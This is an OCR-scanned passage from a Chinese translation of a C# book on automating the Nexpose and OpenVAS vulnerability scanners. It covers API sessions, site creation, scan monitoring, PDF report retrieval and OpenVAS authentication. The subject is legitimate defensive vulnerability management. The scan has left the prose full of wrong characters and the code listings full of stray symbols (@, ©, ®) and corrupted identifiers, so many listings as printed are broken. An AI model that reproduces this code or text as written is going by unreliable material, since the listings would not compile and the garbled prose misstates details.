组 。 用 清单 6-8 所 示人 代码 完成 ExecuteCommand () 方法 后 ， 就 能 发 起 APl 请 求 ， 并 根据 响应 内 容 类 型 返回 正确 的 响应 数据 。 


清单 6-8: NexposeSession 类 ExecuteCommand () 方法 的 后 半 部 分 


string response = string.Empty; 
using (HttpWebResponse r = request.@GetResponse() as HttpWebResponse) 


using (StreamReader reader = new @StreamReader(r.GetResponseStream())) 
response = reader.®@ReadToEnd(); 


if (r.ContentType.Contains(@"multipart/mixed")) 


string[ |] splitResponse = response 
.Split(new string[] {©@"--AxB9s13299asdjvbA"}, StringSplitOptions.None); 


splitResponse = splitResponsel[2] 
.Split(new string[] { @"\r\n\r\n" }, StringSplitOptions.None); 


string base64Data = splitResponsel1]; 


return @Convert.FromBase64String(base64Data); 


} 
} 


return XDocument.Parse(response); 


} 


通常 ， 在 向 Nexpose 故 送 XML 命 令 的 时 候 ， 同 样 会 得 到 一 个 XML 响应 。 但 是 当 你 请 求 一 个 漏洞 扫 摘 报 告 的 时 候 ， 比 如 在 执 
行 完 漏洞 扫描 后 我 们 请 求 一 个 PDF 格式 的 报告 ， 你 就 会 得 到 multipart/mixed 格 式 的 HTTP 响 应 而 不 是 application/xm| 格 式 的 
HTTP 响 应 。 实 际 上 Nexpose 基 于 PDF 报告 更 改 HTTP 响 应 类 型 的 原因 并 不 是 很 清楚 ， 但 是 由 于 我 们 的 请 求 可 能 返回 Base64 编 码 
的 报告 也 可 能 返回 XDocument (第 3 章 首次 使 用 过 的 XML 文档 类 ) 作为 响应 ， 所 以 要 能 够 处 理 这 两 种 类 型 的 响应 。 


为 了 开始 读 取 从 Nexpose 返 回 的 HTTP 咽 应 ,我 们 调用 GetResponse () 万 法 @ 从 而 能 读 取 HTTP 的 响应 字 市 流 ; 然后 创建 
一 个 StreamReader 对 象 @ 来 将 响应 数据 读 取 到 一 个 字符 串 @ 中 ， 并 对 啊 应 数据 的 内 容 类 型 进行 检查 。 因 为 Nexpose 的 
multipart/mixedG@) 类 型 的 响应 总 是 使 用 字符 串 --AxB9sl3299asdjvbA 来 分 隔 HTTP 响 应 中 的 HTTP 参 数 ， 所 以 如 果 响 应 类 型 是 
multipart/mixed@， 融 可 利用 该 特性 来 解析 报 备 数据 ， 将 啊 应 分 隅 仓 入 字符 串 数 组 中 。 


完成 HTTP 咯 应 分 隅 之 后 ， 得 到 的 结果 字符 串 数 组 中 的 第 三 个 元 素 总 是 包含 Base64 编 码 的 扫 摘 报告 数据 。 代 码 @ 用 两 个 换行 
符 (ANnNNn) 来 分 离 出 报告 数据 。 现 在 只 需 天 注 Base64 编 码 的 数据 了 ， 不 过 首先 必须 从 Base64 编 码 报告 的 未 尾 将 一 些 无 效 的 
数据 去 除 挥 。 最 后 ， 将 Base64 编 码 的 数据 传 给 Convert.FromBase64String () @， 返 回 该 Base64 解 码 数 据 的 字 市 数组 ， 这 些 
字 节 随后 融会 写 入 文件 作为 最 终 的 可 读 的 PDF 报告 。 


6.2.2 ”注销 及 释放 会 十 


清单 6-9 给 出 了 Logout () 方法 和 Dispose () 方法 ， 这 两 个 方法 使 得 从 会 话 中 注销 以 及 清理 会 话 数据 变 得 容易 。 


清单 6-9: NexposeSession 类 的 Dispose () 方法 和 Logout () 方法 


public XDocument @Logout() 
{ 


XDocument cmd = new @XDocument( 
new XElement(©@"LogoutRequest", 
new XAttribute(@"session-id", this.SessionID))); 
XDocument doc = (XDocument)this.ExecuteCommand(cmd); 
this.@IsAuthenticated = false; 
this.SessionID = string.Empty; 


return doc ; 


public void @Dispose() 


{ 
if (this.@IsAuthenticated) 


this.Logout(); 


在 Logout () 万 法 @@ 中 ， 我 们 构建 了 一 个 XDocument 对 象 @， 该 对 象 有 一 个 根 节 点 LogoutRequestG@， 一 个 属性 session- 
id@。 当 将 这 些 信 息 以 XML 格式 友和 大 给 Nexpose 时 ，Nexpose 会 过 试 使 会 话 I1D 令 牌 变 得 无 效 ， 有 效 地 将 用 户 注 销 。 同 时 ， 将 
IsAuthenti-catedG@) 的 值 设 置 为 false， 将 Session1D 的 值 设置 为 string.Empty， 从 而 清除 原 有 的 认证 信息 ; 然后 返回 注销 响应 的 
XML 数据 。 


我 们 用 Dispose () 方法 @ (这 是 IDisposable 接 口 所 必需 的 ) 来 清除 Nexpose 会 话 。 正 如 在 代码 @ 处 所 看 到 的 ， 我 们 检查 
是 否 已 通过 验证 ， 如 果 已 通过 验证 ， 束 调用 Logout () 方法 来 使 会 话 失效 。 


6.2.3 ”获取 API 版 本 


清单 6-10 列 出 了 如 何 用 NexposeAPIVersion 变 量 来 确定 要 使 用 哪 一 个 Nexpose API 版 本 。 


清单 6-10: NexposesSession 类 中 使 用 的 枚 举 变量 NexposeAPIVersion 


public enum NexposeAPIVersion 


代码 enum NexposeAPIVersion 使 得 我 们 易于 明确 向 哪 一 个 API URI 发 起 HTTP 请 求 。 在 清单 6-5 中 ， 我 们 正 是 用 
NexposeAPIVersion 来 完成 ExecuteCommand () 方法 中 APIURI 的 实际 构建 。 


6.2.4 贡 用 Nexpose AP 


清单 6-11 列 出 了 如 何 用 NexposeSession 来 与 Nexpose API 通 信 ， 通 过 认证 并 打印 输出 Session1D。 这 是 一 个 很 好 的 测试 ， 


可 以 确保 截至 目前 所 编写 的 代码 都 能 如 期 运行 。 
清单 6-11: 用 NexposeSession 对 Nexpose API 进 行 身 份 验证 并 打印 输出 SessionlD 


class MainClass 
public static void Main(string[ | args) 
using (NexposeSession session = new @NexposeSession("admin", "adm1in!", "192.168.2.171")) 


Console.WritelLine(session.SessionID); 


} 
} 


在 @ 处 ,我 们 溉 试 通过 把 用 户 名 、 密 码 以 及 Nexpose 服 务 器 的 IP 地 址 传 给 一 个 新 建 的 NexposeSession 来 验证 身份 。 如 果 身 
份 验 证 成 功 ， 玖 在 屏幕 上 显示 分 配给 会 话 的 SessionID。 如 果 身 份 验证 失败 ， 残 抛 出 一 个 “认证 失败 ” 异 剃 消息。 


6.3 NexposeManager 类 


如 清单 6-12 所 示 ，NexposeManager 类 用 于 创建 、 监 视 并 报告 扫 摘 的 结果 。 我 们 从 一 个 简单 的 API 调 用 开始 。 


清单 6-12: NexposeManager 类 及 其 GetSysteminformation () 方法 


public class NexposeManager : @IDisposable 


{ 


private readonly NexposeSession session; 
public NexposeManager(@NexposeSession session) 


if (!session.®@IsAuthenticated) 
throw new @ArgumentException("Trying to create manager from 
+ "Unauthenticated session. Please authenticate.", "session"); 


_session = session; 


} 
public XDocument @CetSystemInformation() 


XDocument xml = new XDocument( 
new XElement("@SystemInformationRequest", 
new XAttribute("session-id", session.SessionID))); 


@return (XDocument) session.ExecuteCommand(xml); 


} 
public void @Dispose( ) 


_session.Logout(); 


} 
} 


NexposeManager 实 现 了 IDisposable@@， 传 入 NexposeSession@) 人 作为 唯一 参数 ， 声 明 一 个 session 变量 来 保存 
NexposeManager 要 使 用 的 NexposeSession 类 ， 后 面 编写 的 Dispose () 方法 @ 使 用 到 了 这 个 session 变量 。 如 果 Nexpose 会 


话 通过 身份 验证 @， 残 把 该 会 话 赋 给 _ session 变量 。 反 之 如 果 未 通过 认证 ， 惑 抛 出 一 个 异 单 @。 


为 了 开始 测试 该 管理 器 类 ， 我 们 将 实现 一 个 简短 的 API 方 法 ， 来 检索 有 关 Nexpose 控 制 台 的 一 些 常见 的 系统 信息 。 
GetSystemlnformation () 方法 @ 友 起 一 个 简单 的 System-lnformationRequest API 请 求 @， 然 后 返回 响应 @)。 


如 清单 6-13 所 示 ， 为 了 打印 输出 Nexpose 系 统 信息 (包括 版 本 信息 ， 比 如 在 用 的 PostgreSQL 版 本 和 Java 版 本 ; 硬件 信息 ， 
比如 CPU 数量 和 可 用 RAM) ， 将 NexposeManager 加 到 清单 6-11 中 的 Main () 方法 中 。 


清单 6-13: 在 Main () 方法 中 使 用 NexposeManager 类 


public static void Main(string[ |] args) 


{ 


using (NexposeSession session = new NexposeSession("admin", "Password!", "192.168.2.171")) 
using (NexposeManager manager = new @NexposeManager(session)) 


Console.WriteLine(manager.@GetSystemInformation().ToString()); 


} 
} 
} 


我 们 将 NexposeSession 类 传 给 NexposeManger 构 造 函 数 (@D， 然 后 调用 GetSystemln-formation () 方法 @ 来 打印 输出 系 
统 信息 ， 如 图 6-4 所 示 。 


CWindowssystem32"cmd.exe 


Microsoft Windows [Uersion 6.1.7v601] 
Gopyright ¢c> 2009 Microsoft Corporation. All rights reserved. 


GCG:“Users\bhperry?CGC:“Users\hperry"“\Desktop\grav_hat_csharp_code、“chb_automating_nexp 
ose“hbin~“Debug\ch6b_automating_nexpose .exe 
<*SvystemlnformationResponse success="1"> 
*StatisticsInformationSummnary> 
<Statistic nanmne="cpu—count'" 2*<-Stat1ist1ic» 
<Statistic name="cpu—speeda'>3491</Statistic» 
《3 上 tatistic :A dd i A Stat1Sst1ic> 
<otatistic namne="disk-tnp">?..shared/temp=142646660* /Statistic» 
<otatistic namne="0s"?Ubuntu Linux 12.04</5tatistic> 
<Statistic name="ram—free>1b15S550M</Statistic> 
<otatistic nanmne="ram—total>»5598184/Statistic» 
<*otatistic name= upD- 上 Ime ?2072555/8tatistic> 
<*otatistic namne="dhb—product'"postgresql<r Statist1ic> 
ed dE PE 2 .4.1 1 UT TL rc 
ompiled by gcc ttGGG> 4.1 .2 20080704 “Redu Hat 4.1.2—55»2,. 64-—bit*-/Stat1istic» 
<Statistic namne="java—name Java HotSpotIM» 64-Bit Server UM/Statistic» 


图 6-4 通过 API 获 取 Nexpose 系 统 信 息 


6.4 目 动 友 起 漏 ; 同 扫 接 


本 书 将 介绍 如 何 用 Nexpose 目 动 开 展 漏洞 扫描 。 首 先 创建 一 个 Nexpose 站 点 ， 然 后 扫描 该 站 点 ， 最 后 下 载 扫 描 结果 报告 。 
这 里 只 用 到 了 Nexpose 强 大 扫描 功能 的 一 些 皮 毛 。 


6.4.1 创建 一 个 拥有 资产 的 站 点 


在 用 Nexpose 扫 描 之 前 ， 我 们 需要 创建 要 扫描 的 站 点 。 清 单 6-14 列 出 了 如 何在 Create-OrUpdateSsite () 方法 中 构建 用 于 
创建 站 点 的 XML API 请 求 。 


清单 6-14: NexposeManager 类 中 的 CreateOrUpdateSite () 方法 


public XDocument @CreateOrUpdateSite(string name, string[|] hostnames = null, 
string[ |[ | ips = null, int siteID = @-1) 


XElement hosts = new @XElement("Hosts"); 
if (@hostnames != null) 


{ 


foreach (string host in hostnames) 
hosts.Add(new XElement("host", host)); 
} 


if (©@ips != null) 


foreach (string[|] range in ips) 


{ 
hosts.Add(new XElement ("range", 


new XAttribute("from", range[0]), 
new XAttribute("to", range[1]))); 


XDocument xml = @new XDocument( 
new XElement("SiteSaveRequest", 
new XAttribute("session-id", session.SessionID), 
new XElement("Site", 
new XAttribute("id", siteID), 
new XAttribute("name", name), 
@hosts, 
new XElement("ScanConfig", 
new XAttribute("name", "Full audit"), 
new XAttribute(@"templateID", "full-audit"))))); 


return (XDocument) session.@ExecuteCommand(xm]) ; 


} 


CreateOrUpdateSite () 方法 @ 有 四 个 参数 : 人 类 可 读 的 站 点 名 称 、 主 机 、 地 址 范围 以 及 站 点 1D。 如 清单 6-14 所 示 ， 如 果 
给 站 点 ID 参数 传 入 值 -1@， 则 创建 一 个 新 站 点 。 在 @ 处 ， 创 建 了 一 个 叫 作 Hosts 的 XML 元 素 。 如 果 有 一 个 hostnames 人 参数 不 是 
null@， 就 将 其 添加 到 Hosts 中 。 同 样 ， 对 于 作为 参数 传递 的 IP 范 围 也 照 此 处 理 。 


接着 ， 我 们 创建 一 个 XDocument 对 象 @ 来 告诉 Nexpose 服 务 器 我 们 已 认证 通过 可 以 友 起 该 API 调 用 ， 该 XDocument 对 象 的 
XML 根 节点 为 SiteSaveRequest， 有 一 个 session-id 属 性 。 在 根 节 点 中 ， 我 们 创建 了 一 个 叫 作 Site 的 XElement 来 保存 该 新 建站 点 
的 特定 信息 和 扫描 配置 细节 ， 比 如 要 扫描 的 主机 @ 和 扫描 模板 ID@®。 在 @ 处 ， 我 们 把 SiteSave-Request 传 递 给 
ExecuteCommand () ， 并 将 ExecuteCommand () 返回 的 对 象 转换 为 XDocument。 


6.4.2 局 动 扫 拉 


清单 6-15 列 出 了 如 何 启 动 一 个 站 点 扫描 ， 并 用 Scansite () 方法 和 GetScanStatus () 方法 获取 站 点 扫 拉 的 状态 。 考 虑 到 
NexposesSession 类 实现 了 所 有 的 通信 ， 这 里 所 需要 做 的 只 是 设置 API 请 求 的 XML 数据 ， 所 以 如 果 顺 利 的 话 ， 你 会 看 到 在 
Manager 类 中 实现 新 API 功 能 是 比较 容易 的 。 


清单 6-15: NexposeManager 类 中 的 Scansite () 方法 和 GetScanStatus () 方法 


public XDocument @ScanSite(int 包 SsiteID ) 
{ 


XDocument xml = @new XDocument( 
new XElement(@"SiteScanRequest", 
new XAttribute("session-id", session.SessionID), 
new XAttribute("site-id", siteID))); 
return (XDocument) session.ExecuteCommand(xml); 


} 


public XDocument @GCetScanStatus(int scanID) 
| 


XDocument xml = @new XDocument( 
new XElement("ScanStatusRequest",， 
new XAttribute("session-id", session.SessionID), 
new XAttribute("scan-id", scanID))); 


return (XDocument) session.ExecuteCommand (xml); 


ScanSite () 方法 @L 以 sitelD@ 作 为 扫描 参数 。 创 建 一 个 以 SiteScanRequest@) 为 根 节点 的 XDocument@)， 然 后 增加 
session-id 属 性 和 site-id 属 性 。 接 着 ， 将 SiteScanRequest XML 数 据 发 送 给 Nexpose 服 务 器 并 返回 收 到 的 响应 。 


GetScanStatus () 方法 @ 接 受 一 个 参数 ， 即 要 进行 的 扫 摘 ID， 扫 摘 ID 是 由 Scan9ite () 方法 返回 的 。 在 创建 一 个 以 
ScanStatusRequest 为 根 节点 的 XDocument@ 并 增加 session-id 属 性 和 site-id 属 性 后 ， 将 生成 的 XDocument 对 象 发 送 给 
Nexpose 服 务 器 ， 向 调用 者 返回 响应 。 


6.5 ”创建 PDF 格 式 站 点 扫 搬 报告 及 删除 站 点 


清单 6-16 列 出 了 如 何 用 GetPdfSiteReport () 和 DeleteSite () 方法 中 的 APl 来 创建 站 点 扫描 报告 并 删除 站 点 。 


清单 6-16: NexposeManager 类 中 的 GetPdfSiteReport () 方法 和 DeleteSite () 方法 


public byte[ ] GetpdfSiteReport(int siteID ) 
{ 
XDocument doc = new XDocument( 
new XElement(@"ReportAdhocGenerateRequest", 
new XAttribute("session-id", session.SessionID), 
new XElement("AdhocReportConfig", 
new XAttribute("template-id", "audit-report"), 
new XAttribute("format", @"pdf"), 
new XElement("Filters", 
new XElement("filter", 
new XAttribute("type", "site"), 
new XAttribute("id", ©@siteID)))))); 


return (@byte[]) session.ExecuteCommand(doc ) ; 


} 


public XDocument @DeleteSite(int siteID ) 
{ 
XDocument xml = new XDocument( 
new XElement(@"SiteDeleteRequest", 
new XAttribute("session-id", session.SessionID), 
new XAttribute("site-id", siteID))); 
@ return (XDocument) session.ExecuteCommand(xml); 


} 


这 两 个 方法 都 只 有 一 个 参数 一 一 止 点 ID。 要 生成 一 个 PDF 报 告 ， 我 们 需要 使 用 Report-AdHocGenerateRequest@， 并 指 
定格 式 为 pdf@O， 指 定 ID 为 要 扫 拉 的 sitelDG@。 因 为 对 于 ReportAdHocGenerateRequest，Nexpose 返 回 的 是 multipart/mixed 
格式 的 HTTP 啊 应 ， 所 以 我 们 将 ExecuteCommand () 返回 的 对 象 存 放 到 字 节 数组 里 面 而 不 是 XDocument 对 象 中 。 即 调用 该 万 
法 后 ， 返 回 的 是 PDF 报告 的 原始 字 节 。 


我 们 用 DeleteSite () 方法 @ 来 删除 站 点 ， 并 创建 SiteDelteRequest XDocument 对 象 @， 然 后 调用 API 返 回 扫描 结果 @)。 


知道 了 如 何 通 过 编程 自动 化 调用 Nexpose， 下 面 惑 让 我 们 创建 一 个 Nexpose 站 点 ， 然 后 对 其 进行 扫 摘 ， 创 建 该 站 点 漏洞 情 
况 的 PDF 格式 报告 ， 最 后 删除 该 站 点 。 如 清单 6-17 所 示 ， 首 先 从 创建 一 个 新 的 扫 摘 站 点 开始 这 个 过 程 ， 然 后 用 两 个 新 建 类 检索 
其 1D。 


清单 6-17: 创建 临时 站 点 并 检索 站 点 1D 


public static void Main(string[ | args) 


{ 


using (NexposeSession session = new @NexposeSession("admin", "adm1in!", "192.168.2.171")) 
, using (NexposeManager manager = new @NexposeManager(session)) 
@string[ ][ | ips = 
| new string[|] { "192.168.2.169", @string.Empty } 
}; 
XDocument site = manager.@CreateOrUpdateSite(@Guid.NewGuid().ToString(), null, ips); 


int siteID = int.Parse(site.Root.Attribute("site-id").Value); 


在 创建 NexposeSession@ 和 NexposeManager@ 对 象 后 ， 将 要 扫 拉 的 具有 起 始 地 址 和 终止 地 址 的 IP 地 址 列表 作为 stringG@) 
传 入 。 如 @ 处 所 示 ， 如 要 扫 摘 单个 IP 地 址 ， 只 需 将 空 字 符 串 作为 第 二 个 元 素 即 可 。 我 们 将 目标 IP 地 址 列表 和 作为 临时 站 点 名 称 的 
Guid 一 起 传 给 CreateOrUpdatesite () 廊 法 (站 操 名 称 需要 一 个 唯一 的 字符 串 ) 。 当 从 Nexpose 接 收 到 创建 临时 站 点 的 HTTP 
响应 时 ， 从 收 到 的 XML 数 据 中 获取 站 点 1D 并 保存 起 来 。 


6.6.1 开始 扫 拉 


如 清单 6-18 所 示 ， 通 过 使 用 while 循 环 和 休眠 来 运行 和 监控 漏洞 扫 摘 直 全 结束 。 


清单 6-18: 局 动 并 监控 Nexpose 扫 摘 


XDocument scan = manager.@S9Scan9ite(siteID ) ; 
XElement ele = scan.XPathSelectElement("//SiteScanResponse/Scan"); 


int scanID = int.Parse(ele.Attribute("scan-id").Value); 


XDocument status = manager.@GetScanStatus(scanID); 
while (status.Root.Attribute("status").Value != ©@"finished") 


Thread. Sleep(1000); 

status = manager.GetScanStatus(scanID); 

Console.@WriteLine(DateTime.Now.ToLongTimeString()+": "+status.ToString()); 
} 


通过 向 ScanSite () 万 法 @ 传 递 站 后 ID 来 开始 扫 拉 ， 然 后 从 咽 应 中 获取 扫 描 iD 并 将 其 传递 给 GetScanStatus () 方法 @@。 随 


后 ， 在 while 循 环 中 ， 只 要 友 现 扫描 状态 是 未 结束 (not finished) @， 束 休眠 等 待 几 秒 钟 。 然 后 ， 再 次 检查 扫描 的 状态 ， 用 
WriteLine () 方法 @ 同 用 户 输 出 扫描 状态 消息 。 


6.6.2 ”和 后 成 扫 搬 报告 并 删除 站 所 


一 旦 扫 拉 结束， 就 能 生成 扫 拉 报告 并 删除 站 点 ， 如 清单 6-19 所 示 。 
清单 6-19: 检索 Nexpose 站 点 报告 ， 写 到 文件 系统 ， 然 后 删除 站 点 


byte[ | report = manager.@CGetpdfSiteReport(siteID); 

string outdir = Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory); 
string outpath = Path.Combine(outdir, @siteID + ".pdf"); 
File.@WriteAllBytes(outpath, report); 


manager. @DeleteSite(siteID); 


要 生成 报告 ,我 们 将 站 点 1D 传 给 GetPdSiteReport () 方法 @， 该 万 法 返回 字数 组 。 然 后 以 站 点 的 1D 作 为 文件 名 @L.pdf 
作为 扩展 名 ， 用 WriteAllBytes () 方法 @ 将 PDF 格式 的 报告 保存 到 用 户 的 Desktop 目 录 中 。 随 后 用 Deletesite () 万 法 @ 删 除 站 
点 


ANA 


6.6.3 ”执行 目 动 化 扫 手 程序 


清单 6-20 列 出 了 如 何 运行 扫 摘 并 查看 扫 摘 报 告 。 
清单 6-20: 执行 扫 摘 并 将 扫 摘 报告 写 到 用 户 Desktop 目 录 


C:\Users\example\Documents\ch6é\bin\Debug>.\06 automating nexpose.exe 
11:42:24 PM: <ScanStatusResponse success="1" scan-id="4" engine-id="3" status=@ ITunnling /> 


--SNnip-- 

11:47:01 PM: <ScanStatusResponse success="1" scan-id="4" engine-id="3" status="running” /> 
11:47:08 PM: <ScanStatusResponse success="1" scan-id="4" engine-id="3" status=@ "integrating” /> 
11:47:15 PM: <ScanStatusResponse success='1" scan-id="4" engine-id="3" status=@ finished” /> 


C:\Users\example\Documents\ch6é\bin\Debug>dir \Users\example\Desktop\*.pdf 
Volume in drive C is Acer 
Volume Serial Number is 5619-09A2 


Directory of C:\Users\example\Desktop 


07/30/2017 11:47 PM 103,174 4.pdf @ 

09/09/2015 09:52 PM 17,152,368 Automate the Boring Stuff with Python.pdf 
2 File(s) 17,255,542 bytes 
0 Dir(s) 362,552,098,816 bytes free 


C:\Users\example\Documents\ch6\bin\Debug> 
注意 人 在 清单 6-20 的 输出 中 ，Nexpose 返 回 了 至 少 三 种 扫 摘 状态 ， 分 别 对 应 扫描 的 不 同 阶段 : 运行 @Q、 整 合 @、 结 束 @。 与 


预想 的 一 样 ， 在 扫描 结束 之 后 ，PDF 报 告 就 会 写 到 用 户 的 Desktop 目 录 。 你 可 用 常用 的 PDF 阅读 器 打开 新 生成 的 报告 ， 来 看 看 
Nexpose 到 底 友 现 了 哪些 类 型 的 漏洞 。 


6.7 ”本 童 小 结 


本 章 介 绍 了 如 何 用 漏洞 扫描 器 Nexpose 来 报告 网 络 上 给 定 主 机 的 漏洞 ， 包 括 Nex-pose 如 何 存 储 网 络 上 计算 机 的 相关 信息 ， 
比如 站 点 和 人 资产。 介绍 了 如 何 用 基本 的 C# 库 构建 一 些 类 来 编程 调用 Nexpose， 如 何 用 NexposeSession 类 来 与 Nexpose 进 行 身 
份 认证 ， 如 何 向 Nexpose API 友 送 XML 数 据 ， 以 及 如 何 从 Nexpose API 接 收 XML 数据 。 也 介绍 了 NexposeManager 类 如 何 封 丢 
APl 中 的 功能 ， 包 括 创建 及 删除 站 点 。 最 后 ， 利 用 上 述 内 容 你 就 能 调用 Nexpose 来 扫 摘 网 络 资产 ， 并 生成 输出 易 读 的 PDF 格式 报 
告 来 展示 扫描 结果 ，。 


当然 Nexpose 的 能 力 远 不 止 简单 的 漏洞 管理 。 通 过 扩充 库 来 使 用 Nexpose 的 其 他 高 级 功能 也 并 不 困难 ， 这 对 你 熟悉 一 些 
Nexpose 的 强大 功能 也 是 非 营 有 帮助 的 ， 比 如 定制 扫 摘 案 略 、 进 行 认证 后 的 漏洞 扫 摘 ， 以 及 输出 更 多 样 的 定制 化 报告 。 一 个 乞 
进 、 现 代 、 成 熟 的 企业 网 络 需 要 具备 不 同 粒度 的 系统 控制 ， 以 便 将 安全 集成 到 其 业务 工作 流 中 。 既 然 Nexpose 提 供 了 如 此 强大 
的 功能 ，IT 管 理 者 或 者 系统 管理 员 都 应 把 Nexpose 作 为 日 常 工具 库 中 的 一 个 常备 强大 工具 。 


第 7 章 ”自动 化 运行 OpenVAS 


本 章 将 介绍 OpenVAS 及 OpenVAS 管 理 协议 (OMP) 。OpenVAS 是 一 个 免费 开源 的 漏洞 管理 系统 ， 是 Nessus 最 后 开源 版 
本 的 一 个 分 支 。 在 第 5 章 和 第 6 章 ， 我 们 分 别 介绍 了 自动 化 专用 漏洞 扫描 工具 Nessus 和 Nexpose。OpenVAS 也 具有 类 似 的 功 
能 ， 是 另外 一 个 值得 你 在 安全 军械 库 拥有 的 强大 工具 。 


本 章 将 展示 如 何 用 C# 和 核心 库 和 一 些 定制 类 来 调用 OpenVAs 对 网 络 中 的 主机 进行 扫 摘 并 生成 漏洞 报告 。 在 读 完 本 章 之 后 ， 你 
应 该 能 用 OpenVAS 和 C# 来 对 网 络 可 达 的 主机 进行 评估 。 


7.1 安 疙 OpenVAS 


安装 OpenVAS 的 最 简单 的 方式 是 从 http://www.openvas.org/ 下 载 预 构建 的 OpenVAS 演 示 虚 拟 设 备 (OpenVAS Demo 
Virtual Appliance) 。 你 要 下 载 的 是 一 个 .ova 文 件 (开放 虚拟 化 文件 ，open virtualization archive) ， 此 类 文件 可 在 诸如 
VirtualBox 或 VMware 之 类 的 虚拟 化 工具 中 运行 。 在 系统 中 安 半 VirtualBOX 或 VMware 后 ， 用 所 选择 的 虚拟 化 工具 打开 下 载 
的 .ova 文 件 并 运行 该 文件 。 (为 了 提高 OVA 设 备 的 性 能 ， 应 该 至 少 为 其 分 配 4GB 内 存 ) 虚拟 设备 的 root 账 号 的 密码 是 root。 在 
用 最 新 漏洞 数据 更 新 设备 的 时 候 需 要 用 root 用 户 。 


登录 系统 后 ， 通 过 输入 清单 7-1 中 的 命令 来 用 最 新 的 漏洞 信息 更 新 OpenVAS。 
清单 7-1: 用 来 更 新 OpenVAS 的 命令 


# openvas-nvt-sync 
# openvas-scapdata-sync 


# openvas-certdata-sync 
# openvasmd --update 


根据 网 络 情 ; 况 ， 更 新 需要 花费 一 定 的 时 | 间 。 更 新 完成 后 束 可 尝试 连 到 9390 尊 口上 的 openvasmd 进 程 ， 执 行 如 清单 7-2 所 示 
的 测试 命令 。 


清单 7-2: 连接 到 openvasmd 


$ openssl s client <ip address>:9390 

[...SSL NEGOTIATION...] 

<get_ version /> 

<get version response Status= 200” status text="OK"><version>6.0</version></get version response> 


如 果 一 切 顺 利 ， 你 可 在 输出 最 后 的 状态 消息 里 面 看 到 OK 字样 。 


7.2 构建 类 


与 Nexpose API 类 似 ，OpenVAs 也 用 XML 格式 向 服务 器 上 友 送 数据 。 我 们 将 组 合 使 用 前 面 讨论 的 Session 和 Manager 类 来 自 
动 化 OpenVAS 扫 描 。OpenVASSession 类 将 关注 我 们 如 何 与 OpenVAS 通 信 ， 并 进行 认证 。OpenVASManager 类 将 封装 API 的 
见 功能 使 得 程序 员 易 于 使 用 这 些 APl。 


7.3 OpenVASSession 类 


我 们 用 OpenVASSession 类 与 OpenVAS 通 信 。 清 单 7-3 列 出 了 OpenVASSession 类 的 构造 遂 数 和 属性 。 


清单 7-3: OpenVAssession 类 的 构造 阔 数 及 属性 


public class OpenVASSession : IDisposabje 


private SslStream stream = null; 


public OpenVASSession(string user, string pass, string host, int port = @9390) 


{ 
this.ServerIPAddress = @IPAddress.Parse(host); 
this.ServerPort = port; 
this.Authenticate(username, password); 


} 


public string Username { get; set; } 


public string Password { get; set; } 
public IPAddress ServerIPAddress { get; set; } 
public int ServerPort { get; set; } 


public SslStream Stream 


@get 
, 
if ( stream == null) 
GetStream( ) ; 


return stream; 


} 


@set { stream = value; } 


} 


OpenVASSession 构 造 函 数 有 四 个 参数 : 用 来 和 OpenVAS 认 证 的 用 户 名 和 密码 (在 虚拟 设备 里 面 默 认 是 admin: 
admin) ; 要 连接 的 主机 ;要 连接 的 主机 端口 ， 默 认 是 9390@， 这 个 参数 是 可 选 参数 。 


我 们 把 host 人 参数 传 给 IPAddress.Parse () @， 将 得 到 的 结果 赋 给 ServerIPAddress 属 性 。 接 着 ， 如 果 认 证 (将 在 下 面 的 小 
节 讨 论 ) 通过 ， 惑 把 痛 口 变量 的 值 赋 给 ServerPort 属 性 ， 把 用 户 名 和 密码 传 给 Authenticate () 方法 。 在 构造 函数 中 给 
ServerlPAddress 和 ServerPort 属 性 赋值 ， 并 在 整个 类 中 一 直 使 用 。 


Stream 属性 使 用 getG@) 来 查看 _stream 私 有 成 员 变 量 是 人 否 为 null。 如 果 是 null， 融 调用 Getstream () 方法 ， 访 方法 用 一 个 
到 OpenVAS 的 连接 设置 stream@ 并 返回 stream 的 值 。 


7.3.1 OpenVAS 服 务 器 认证 


为 了 通过 OpenVAs 服 务 器 认证 ， 疝 OpenVAsS 友 人 送 一 个 包含 用户 名 和 密码 的 XML 文档 ， 然 后 读 取 啊 应 ， 如 清单 7-4 所 示 。 如 
果 认 证 成 功 ， 我 们 将 可 以 调用 更 高 权限 的 命令 来 捐 定 扫 摘 的 目标 、 检 索 报 告 等 。 


清单 7-4: OpenVASSession 构 造 冰 数 的 Authenticate () 方法 


public XDocument @Authenticate(string username, string password) 
{ 
XDocument authXML = new XDocument( 
new XElement("authenticate", 
new XElement("credentials", 
new XElement("username", @username), 


new XElement("password", @password)))); 
XDocument response = this.@ExecuteCommand(authXML ) ; 


if (response.Root.Attribute(©@"status").Value != "200") 
throw new Exception("Authentication failed"); 


this.Username = username; 
this.Password = password; 


return response,; 


} 


Authenticate () 方法 @ 接 受 两 个 参数 : 用 来 进行 OpenVASs 认 证 的 用 户 名 @ 和 密码 @。 使 用 提供 的 用 户 名 和 密码 认证 信 
息 ， 创 建 一 个 新 的 认证 XML 命令 ; 然后 用 Execute-Command () @ 友 送 认证 请 求 ， 存 储 响 应 从 而 确保 认证 成 功 ， 并 得 到 认证 
令 牌 。 


如 果 服 务 器 返回 的 根 XML 元 素 的 status 属 性 为 200， 认 证 就 成 功 了 。 接 着 在 方法 中 给 Username 属 性 、Password 属 性 以 及 
其 他 参数 赋值 ， 最 后 该 方法 返回 该 认证 的 响应 。 


7.3.2 ”创建 执行 OpenVAS 命 令 的 万 法 
清单 7-5 列 出 了 ExecuteCommand () 方法 ， 该 方法 接收 任意 OpenVAS 命 令 ， 将 命令 发 送 给 OpenVAS， 然 后 返回 执行 结 
果 。 


清单 7-5: 用 于 执行 OpenVAS 命 令 的 EXecuteCommand () 方法 


public XDocument ExecuteCommand(XDocument doc ) 
ASCIIEncoding enc = new ASCIIEncoding(); 


string xml = doc.ToString(); 
this.Stream. @Write(enc.GetBytes(xml), 0, xml.Length); 


return ReadMessage(this.Stream); 


} 
要 通过 OpenVAS 管 理 协 议 执行 命令 ,我们 用 TCP 套 接 字 同 服务 器 友 送 XML 文 档 并 接收 响应 中 的 XML 文 档 。 


ExcuteCommand () 方法 只 有 一 个 参数 : 要 友 送 的 XML 文 档 。 对 XML 文 档 调 用 ToString () 方法 ,保存 结果 ， 然 后 用 Stream 
属性 的 Write () 方法 将 XML 写 到 流 中 。 


7.3.3” 读 取 服 务 器 肖 恩 


